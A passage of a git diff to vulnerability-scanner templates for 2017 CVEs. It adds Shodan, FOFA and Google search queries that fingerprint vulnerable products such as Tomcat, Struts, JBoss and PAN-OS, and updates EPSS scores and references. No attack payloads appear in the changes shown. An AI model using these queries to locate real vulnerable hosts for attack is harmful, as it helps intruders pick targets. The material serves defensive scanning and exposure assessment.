b/http/cves/2017/CVE-2017-11165.yaml index 5bdccda632..47cd2c3ca3 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -29,6 +29,8 @@ info: vendor: datataker product: dt80_dex_firmware shodan-query: http.title:"datataker" + fofa-query: title="datataker" + google-query: intitle:"datataker" tags: cve2017,cve,lfr,edb,datataker,config,packetstorm,exposure http: diff --git a/http/cves/2017/CVE-2017-11444.yaml b/http/cves/2017/CVE-2017-11444.yaml index 08e502507c..60d4828293 100644 --- a/http/cves/2017/CVE-2017-11444.yaml +++ b/http/cves/2017/CVE-2017-11444.yaml @@ -13,20 +13,21 @@ info: - https://github.com/intelliants/subrion/issues/479 - https://mp.weixin.qq.com/s/89mCnjUCvmptLsKaeVlC9Q - https://nvd.nist.gov/vuln/detail/CVE-2017-11444 + - https://github.com/d4n-sec/d4n-sec.github.io + - https://github.com/qazbnm456/awesome-cve-poc classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2017-11444 cwe-id: CWE-89 epss-score: 0.018 - epss-percentile: 0.86776 + epss-percentile: 0.88111 cpe: cpe:2.3:a:intelliants:subrion_cms:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: intelliants product: subrion_cms tags: cve2017,cve,sqli,subrion,intelliants - variables: string: "{{to_lower(rand_base(5))}}" hex_string: "{{hex_encode(string)}}" diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 8b2924e2e0..ae2c4977b6 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -30,6 +30,8 @@ info: vendor: manageengine product: servicedesk shodan-query: http.title:"ManageEngine" + fofa-query: title="manageengine" + google-query: intitle:"manageengine" tags: cve,cve2017,manageengine,lfr,unauth,tenable http: diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index eeb8555f87..0fc1dd91b5 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -20,14 +20,16 @@ info: cvss-score: 8.8 cve-id: CVE-2017-11610 cwe-id: CWE-276 - epss-score: 0.97449 - epss-percentile: 0.99947 + epss-score: 0.9745 + epss-percentile: 0.9995 cpe: cpe:2.3:a:supervisord:supervisor:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: supervisord product: supervisor shodan-query: http.title:"Supervisor Status" + fofa-query: title="supervisor status" + google-query: intitle:"supervisor status" tags: cve2017,cve,oast,xmlrpc,msf,rce,supervisor,supervisord http: diff --git a/http/cves/2017/CVE-2017-12138.yaml b/http/cves/2017/CVE-2017-12138.yaml index 98472b843b..c1061f11a2 100644 --- a/http/cves/2017/CVE-2017-12138.yaml +++ b/http/cves/2017/CVE-2017-12138.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12138 cwe-id: CWE-601 epss-score: 0.00062 - epss-percentile: 0.24419 + epss-percentile: 0.26054 cpe: cpe:2.3:a:xoops:xoops:2.5.8:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 58f8620d53..b9fa62b044 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-12149 cwe-id: CWE-502 epss-score: 0.9719 - epss-percentile: 0.99802 + epss-percentile: 0.9982 cpe: cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:* metadata: max-request: 3 vendor: redhat product: jboss_enterprise_application_platform + shodan-query: http.title:"jboss" + fofa-query: title="jboss" + google-query: intitle:"jboss" tags: cve2017,cve,java,rce,deserialization,kev,vulhub,jboss,intrusive,redhat http: diff --git a/http/cves/2017/CVE-2017-12544.yaml b/http/cves/2017/CVE-2017-12544.yaml index 6cc4cf375b..6f54790839 100644 --- a/http/cves/2017/CVE-2017-12544.yaml +++ b/http/cves/2017/CVE-2017-12544.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-12544 cwe-id: CWE-79 epss-score: 0.96723 - epss-percentile: 0.99637 + epss-percentile: 0.99656 cpe: cpe:2.3:a:hp:system_management_homepage:*:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 4ee30b5e16..b45f61def0 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -18,14 +18,16 @@ info: cvss-score: 6.1 cve-id: CVE-2017-12583 cwe-id: CWE-79 - epss-score: 0.00117 - epss-percentile: 0.44712 + epss-score: 0.00088 + epss-percentile: 0.37623 cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dokuwiki product: dokuwiki shodan-query: http.title:"DokuWiki" + fofa-query: title="dokuwiki" + google-query: intitle:"dokuwiki" tags: cve,cve2017,xss,dokuwiki http: diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index a62430eeb1..ffac334e3b 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -27,6 +27,9 @@ info: max-request: 1 vendor: apache product: struts + shodan-query: http.html:"apache struts" + fofa-query: body="struts problem report" + google-query: intitle:"struts2 showcase" tags: cve,cve2017,apache,rce,struts http: diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 208f3d300a..cf158721ed 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -29,6 +29,8 @@ info: vendor: apache product: tomcat shodan-query: title:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2017,cve,rce,tomcat,kev,vulhub,apache,fileupload,intrusive http: diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index ff6836350e..86993059e5 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -30,6 +30,8 @@ info: vendor: apache product: tomcat shodan-query: html:"Apache Tomcat" + fofa-query: body="apache tomcat" + google-query: intitle:"apache tomcat" tags: cve2017,cve,tomcat,apache,rce,kev,intrusive http: diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index ad974d371a..535be66581 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -27,6 +27,9 @@ info: max-request: 2 vendor: apache product: solr + shodan-query: cpe:"cpe:2.3:a:apache:solr" + fofa-query: title="solr admin" + google-query: intitle:"apache solr" tags: cve2017,cve,oast,xxe,vulhub,solr,apache http: diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 651e869029..53f14a8754 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -27,6 +27,7 @@ info: max-request: 1 vendor: apache product: couchdb + shodan-query: product:"couchdb" tags: cve2017,cve,couchdb,apache,intrusive http: diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index 38169b306e..d037475149 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -28,6 +28,7 @@ info: vendor: sap product: netweaver_application_server_java shodan-query: http.favicon.hash:-266008933 + fofa-query: icon_hash=-266008933 tags: cve2017,cve,sap,lfi,java,traversal http: diff --git a/http/cves/2017/CVE-2017-12794.yaml b/http/cves/2017/CVE-2017-12794.yaml index 13ca931fa2..6ab7cbf571 100644 --- a/http/cves/2017/CVE-2017-12794.yaml +++ b/http/cves/2017/CVE-2017-12794.yaml @@ -22,12 +22,13 @@ info: cve-id: CVE-2017-12794 cwe-id: CWE-79 epss-score: 0.00219 - epss-percentile: 0.59827 + epss-percentile: 0.59849 cpe: cpe:2.3:a:djangoproject:django:1.10.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: djangoproject product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: cve2017,cve,xss,django,djangoproject http: diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index 199cc5bec1..f4e2e467ab 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -21,13 +21,15 @@ info: cve-id: CVE-2017-14135 cwe-id: CWE-78 epss-score: 0.96679 - epss-percentile: 0.99625 + epss-percentile: 0.99643 cpe: cpe:2.3:a:dreambox:opendreambox:2.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: dreambox product: opendreambox shodan-query: title:"Dreambox WebControl" + fofa-query: title="dreambox webcontrol" + google-query: intitle:"dreambox webcontrol" tags: cve,cve2017,dreambox,rce,oast,edb http: diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index e70352dcf8..a3263f8883 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14186 cwe-id: CWE-79 epss-score: 0.02948 - epss-percentile: 0.89847 + epss-percentile: 0.90833 cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* metadata: verified: true @@ -30,6 +30,7 @@ info: vendor: fortinet product: fortios shodan-query: port:10443 http.favicon.hash:945408572 + fofa-query: body="/remote/login" "xxxxxxxx" tags: cve2017,cve,fortigate,xss,fortinet http: diff --git a/http/cves/2017/CVE-2017-14524.yaml b/http/cves/2017/CVE-2017-14524.yaml index 20a95213bc..e4e58c7c93 100644 --- a/http/cves/2017/CVE-2017-14524.yaml +++ b/http/cves/2017/CVE-2017-14524.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14524 cwe-id: CWE-601 epss-score: 0.00258 - epss-percentile: 0.6357 + epss-percentile: 0.65482 cpe: cpe:2.3:a:opentext:documentum_administrator:7.2.0180.0055:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14535.yaml b/http/cves/2017/CVE-2017-14535.yaml index 3c902736d6..807a3466db 100644 --- a/http/cves/2017/CVE-2017-14535.yaml +++ b/http/cves/2017/CVE-2017-14535.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-14535 cwe-id: CWE-78 epss-score: 0.04456 - epss-percentile: 0.91577 + epss-percentile: 0.92413 cpe: cpe:2.3:a:netfortris:trixbox:2.8.0.4:*:*:*:*:*:*:* metadata: max-request: 1 diff --git a/http/cves/2017/CVE-2017-14622.yaml b/http/cves/2017/CVE-2017-14622.yaml index 14d594b33d..93c4d4edee 100644 --- a/http/cves/2017/CVE-2017-14622.yaml +++ b/http/cves/2017/CVE-2017-14622.yaml @@ -22,7 +22,7 @@ info: cve-id: CVE-2017-14622 cwe-id: CWE-79 epss-score: 0.00135 - epss-percentile: 0.47816 + epss-percentile: 0.48695 cpe: cpe:2.3:a:2kblater:2kb_amazon_affiliates_store:*:*:*:*:*:wordpress:*:* metadata: verified: true diff --git a/http/cves/2017/CVE-2017-14651.yaml b/http/cves/2017/CVE-2017-14651.yaml index a3aac17359..2e53ed8d0e 100644 --- a/http/cves/2017/CVE-2017-14651.yaml +++ b/http/cves/2017/CVE-2017-14651.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-14651 cwe-id: CWE-79 epss-score: 0.00144 - epss-percentile: 0.49339 + epss-percentile: 0.50196 cpe: cpe:2.3:a:wso2:api_manager:2.1.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: wso2 product: api_manager + shodan-query: http.favicon.hash:1398055326 + fofa-query: icon_hash=1398055326 + google-query: inurl:"carbon/admin/login" tags: cve,cve2017,wso2,xss http: diff --git a/http/cves/2017/CVE-2017-14849.yaml b/http/cves/2017/CVE-2017-14849.yaml index 9ffbdca378..6684332084 100644 --- a/http/cves/2017/CVE-2017-14849.yaml +++ b/http/cves/2017/CVE-2017-14849.yaml @@ -13,18 +13,21 @@ info: - https://twitter.com/nodejs/status/913131152868876288 - https://nodejs.org/en/blog/vulnerability/september-2017-path-validation/ - https://nvd.nist.gov/vuln/detail/CVE-2017-14849 + - https://github.com/ARPSyndicate/kenzer-templates + - https://github.com/Elsfa7-110/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2017-14849 cwe-id: CWE-22 epss-score: 0.96684 - epss-percentile: 0.99566 + epss-percentile: 0.99644 cpe: cpe:2.3:a:nodejs:node.js:8.5.0:*:*:*:*:*:*:* metadata: max-request: 1 vendor: nodejs product: node.js + shodan-query: cpe:"cpe:2.3:a:nodejs:node.js" tags: cve2017,cve,nodejs,lfi http: diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index cae97e7f8a..7d33bbe2f5 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -27,6 +27,7 @@ info: max-request: 2 vendor: apache product: http_server + shodan-query: cpe:"cpe:2.3:a:apache:http_server" tags: cve,cve2017,apache,httpd,fileupload,vulhub,intrusive http: diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index 7b6d9d5a2a..c29e2c2cc8 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: paloaltonetworks product: pan-os + fofa-query: icon_hash="-631559155" + shodan-query: http.favicon.hash:"-631559155" tags: cve2017,cve,kev,edb,rce,vpn,panos,globalprotect,paloaltonetworks http: diff --git a/http/cves/2017/CVE-2017-16806.yaml b/http/cves/2017/CVE-2017-16806.yaml index 95bebe1838..ab3f62c861 100644 --- a/http/cves/2017/CVE-2017-16806.yaml +++ b/http/cves/2017/CVE-2017-16806.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-16806 cwe-id: CWE-22 epss-score: 0.07105 - epss-percentile: 0.93842 + epss-percentile: 0.93981 cpe: cpe:2.3:a:ulterius:ulterius_server:1.5.6.0:*:*:*:*:*:*:* metadata: max-request: 2 diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 8904a4eeb1..6454c291c4 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -26,6 +26,8 @@ info: max-request: 1 vendor: zeit product: next.js + shodan-query: http.html:"/_next/static" + fofa-query: body="/_next/static" tags: cve,cve2017,nextjs,lfi,traversal,zeit http: diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 1bcbc76088..8be78e7854 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-17043 cwe-id: CWE-79 epss-score: 0.00245 - epss-percentile: 0.63923 + epss-percentile: 0.64551 cpe: cpe:2.3:a:zitec:emag_marketplace_connector:1.0.0:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: emag_marketplace_connector framework: wordpress tags: cve,cve2017,xss,wp-plugin,packetstorm,wordpress,zitec - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index 281396a53a..3a686685aa 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -13,13 +13,14 @@ info: - https://github.com/NaturalIntelligence/wp-thumb-post/issues/1 - https://packetstormsecurity.com/files/145044/WordPress-amtyThumb-8.1.3-Cross-Site-Scripting.html - https://nvd.nist.gov/vuln/detail/CVE-2017-17059 + - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2017-17059 cwe-id: CWE-79 - epss-score: 0.00261 - epss-percentile: 0.63794 + epss-score: 0.00242 + epss-percentile: 0.642 cpe: cpe:2.3:a:amtythumb_project:amtythumb:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -27,7 +28,6 @@ info: product: amtythumb framework: wordpress tags: cve2017,cve,xss,wp-plugin,packetstorm,wordpress,amtythumb_project - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 700e1be344..be3d789c42 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -21,7 +21,7 @@ info: cve-id: CVE-2017-17451 cwe-id: CWE-79 epss-score: 0.00178 - epss-percentile: 0.55144 + epss-percentile: 0.54962 cpe: cpe:2.3:a:wpmailster:wp_mailster:*:*:*:*:*:wordpress:*:* metadata: max-request: 1 @@ -29,7 +29,6 @@ info: product: wp_mailster framework: wordpress tags: cve,cve2017,wordpress,xss,wp-plugin,packetstorm,wpmailster - flow: http(1) && http(2) http: diff --git a/http/cves/2017/CVE-2017-17562.yaml b/http/cves/2017/CVE-2017-17562.yaml index 4bfef0fdf6..46a33424f9 100644 --- a/http/cves/2017/CVE-2017-17562.yaml +++ b/http/cves/2017/CVE-2017-17562.yaml @@ -28,6 +28,7 @@ info: max-request: 65 vendor: embedthis product: goahead + shodan-query: cpe:"cpe:2.3:a:embedthis:goahead" tags: cve,cve2017,rce,goahead,fuzz,kev,vulhub,embedthis http: diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index bf8b0e1e71..7d98aa51e1 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -30,6 +30,8 @@ info: vendor: kentico product: kentico_cms google-query: intitle:"kentico database setup" + shodan-query: cpe:"cpe:2.3:a:kentico:kentico_cms" + fofa-query: title="kentico database setup" tags: cve2017,cve,kentico,cms,install,unauth,edb http: diff --git a/http/cves/2017/CVE-2017-18024.yaml b/http/cves/2017/CVE-2017-18024.yaml index 3f5b40e325..14024f2780 100644 --- a/http/cves/2017/CVE-2017-18024.yaml +++ b/http/cves/2017/CVE-2017-18024.yaml @@ -21,12 +21,15 @@ info: cve-id: CVE-2017-18024 cwe-id: CWE-79 epss-score: 0.00074 - epss-percentile: 0.30209 + epss-percentile: 0.31612 cpe: cpe:2.3:a:avantfax:avantfax:3.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: avantfax product: avantfax + shodan-query: http.title:"avantfax - login" + fofa-query: title="avantfax - login" + google-query: intitle:"avantfax - login" tags: cve,cve2017,avantfax,hackerone,packetstorm,xss http: diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 8f9ac61405..dca5028bfe 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -26,6 +26,8 @@ info: product: google_adsense framework: wordpress publicwww-query: "/wp-content/plugins/adsense-plugin/" + shodan-query: http.html:/wp-content/plugins/adsense-plugin/ + fofa-query: body=/wp-content/plugins/adsense-plugin/ tags: cve,cve2017,wordpress,wpscan,wp-plugin,xss,bws-adpush,authenticated,google_adsense_project http: diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index bcbe1eff61..66e01c1136 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -26,6 +26,8 @@ info: product: contact_form_multi framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-multi/" + shodan-query: http.html:/wp-content/plugins/contact-form-multi/ + fofa-query: body=/wp-content/plugins/contact-form-multi/ tags: cve,cve2017,wordpress,bws-contact-form,wpscan,wp-plugin,xss,authenticated,contact-form-multi,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index 73517d0595..964c52810f 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18491 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:contact_form:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: contact_form framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-plugin/" + shodan-query: http.html:/wp-content/plugins/contact-form-plugin/ + fofa-query: body=/wp-content/plugins/contact-form-plugin/ tags: cve,cve2017,wordpress,bws,contact-form,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index c7fa05e53a..bcc3055173 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -26,6 +26,8 @@ info: product: contact_form_to_db framework: wordpress publicwww-query: "/wp-content/plugins/contact-form-to-db/" + shodan-query: http.html:/wp-content/plugins/contact-form-to-db/ + fofa-query: body=/wp-content/plugins/contact-form-to-db/ tags: cve2017,cve,wordpress,wpscan,bws-contact-form,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 0d6b511623..b3f94004bc 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -26,6 +26,8 @@ info: product: custom_admin_page framework: wordpress publicwww-query: "/wp-content/plugins/custom-admin-page/" + shodan-query: http.html:/wp-content/plugins/custom-admin-page/ + fofa-query: body=/wp-content/plugins/custom-admin-page/ tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index f35075d372..3ca18d781a 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18494 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36857 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: custom_search framework: wordpress publicwww-query: "/wp-content/plugins/custom-search-plugin/" + shodan-query: http.html:/wp-content/plugins/custom-search-plugin/ + fofa-query: body=/wp-content/plugins/custom-search-plugin/ tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 9cd3d64dfa..c4586cd270 100644 --- a/http/cves/2017/CVE-2017-18496.yaml +++ b/http/cves/2017/CVE-2017-18496.yaml @@ -26,6 +26,8 @@ info: product: htaccess framework: wordpress publicwww-query: "/wp-content/plugins/htaccess/" + shodan-query: http.html:/wp-content/plugins/htaccess/ + fofa-query: body=/wp-content/plugins/htaccess/ tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18500.yaml b/http/cves/2017/CVE-2017-18500.yaml index d1554790f4..cc7a41659f 100644 --- a/http/cves/2017/CVE-2017-18500.yaml +++ b/http/cves/2017/CVE-2017-18500.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18500 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60522 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: social_buttons_pack framework: wordpress publicwww-query: "/wp-content/plugins/social-buttons-pack/" + shodan-query: http.html:/wp-content/plugins/social-buttons-pack/ + fofa-query: body=/wp-content/plugins/social-buttons-pack/ tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18501.yaml b/http/cves/2017/CVE-2017-18501.yaml index 7f84a097f0..faa0193501 100644 --- a/http/cves/2017/CVE-2017-18501.yaml +++ b/http/cves/2017/CVE-2017-18501.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18501 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.60522 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: social_login framework: wordpress publicwww-query: "/wp-content/plugins/social-login-bws/" + shodan-query: http.html:/wp-content/plugins/social-login-bws/ + fofa-query: body=/wp-content/plugins/social-login-bws/ tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18502.yaml b/http/cves/2017/CVE-2017-18502.yaml index c6c6d10ba6..a2da2b6576 100644 --- a/http/cves/2017/CVE-2017-18502.yaml +++ b/http/cves/2017/CVE-2017-18502.yaml @@ -17,7 +17,7 @@ info: cve-id: CVE-2017-18502 cwe-id: CWE-79 epss-score: 0.00231 - epss-percentile: 0.61251 + epss-percentile: 0.61183 cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -26,6 +26,8 @@ info: product: subscriber framework: wordpress publicwww-query: "/wp-content/plugins/subscriber/" + shodan-query: http.html:/wp-content/plugins/subscriber/ + fofa-query: body=/wp-content/plugins/subscriber/ tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18505.yaml b/http/cves/2017/CVE-2017-18505.yaml index 93ddcfad77..cea2025592 100644 --- a/http/cves/2017/CVE-2017-18505.yaml +++ b/http/cves/2017/CVE-2017-18505.yaml @@ -26,6 +26,8 @@ info: product: twitter_button framework: wordpress publicwww-query: "/wp-content/plugins/twitter-plugin/" + shodan-query: http.html:/wp-content/plugins/twitter-plugin/ + fofa-query: body=/wp-content/plugins/twitter-plugin/ tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18516.yaml b/http/cves/2017/CVE-2017-18516.yaml index bedf2a9ea8..b060708a0b 100644 --- a/http/cves/2017/CVE-2017-18516.yaml +++ b/http/cves/2017/CVE-2017-18516.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18516 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: linkedin framework: wordpress publicwww-query: "/wp-content/plugins/bws-linkedin/" + shodan-query: http.html:/wp-content/plugins/bws-linkedin/ + fofa-query: body=/wp-content/plugins/bws-linkedin/ tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18517.yaml b/http/cves/2017/CVE-2017-18517.yaml index 590b427a09..5e719cd684 100644 --- a/http/cves/2017/CVE-2017-18517.yaml +++ b/http/cves/2017/CVE-2017-18517.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18517 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36836 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: pinterest framework: wordpress publicwww-query: /wp-content/plugins/bws-pinterest/ + shodan-query: http.html:/wp-content/plugins/bws-pinterest/ + fofa-query: body=/wp-content/plugins/bws-pinterest/ tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18518.yaml b/http/cves/2017/CVE-2017-18518.yaml index a6aa60cd0c..b4d57d72e3 100644 --- a/http/cves/2017/CVE-2017-18518.yaml +++ b/http/cves/2017/CVE-2017-18518.yaml @@ -18,7 +18,7 @@ info: cve-id: CVE-2017-18518 cwe-id: CWE-79 epss-score: 0.00088 - epss-percentile: 0.36245 + epss-percentile: 0.3753 cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,6 +27,8 @@ info: product: smtp framework: wordpress publicwww-query: /wp-content/plugins/bws-smtp/ + shodan-query: http.html:/wp-content/plugins/bws-smtp/ + fofa-query: body=/wp-content/plugins/bws-smtp/ tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft http: diff --git a/http/cves/2017/CVE-2017-18527.yaml b/http/cves/2017/CVE-2017-18527.yaml index b62e90fb9a..74055e74f8 100644 --- a/http/cves/2017/CVE-2017-18527.yaml +++ 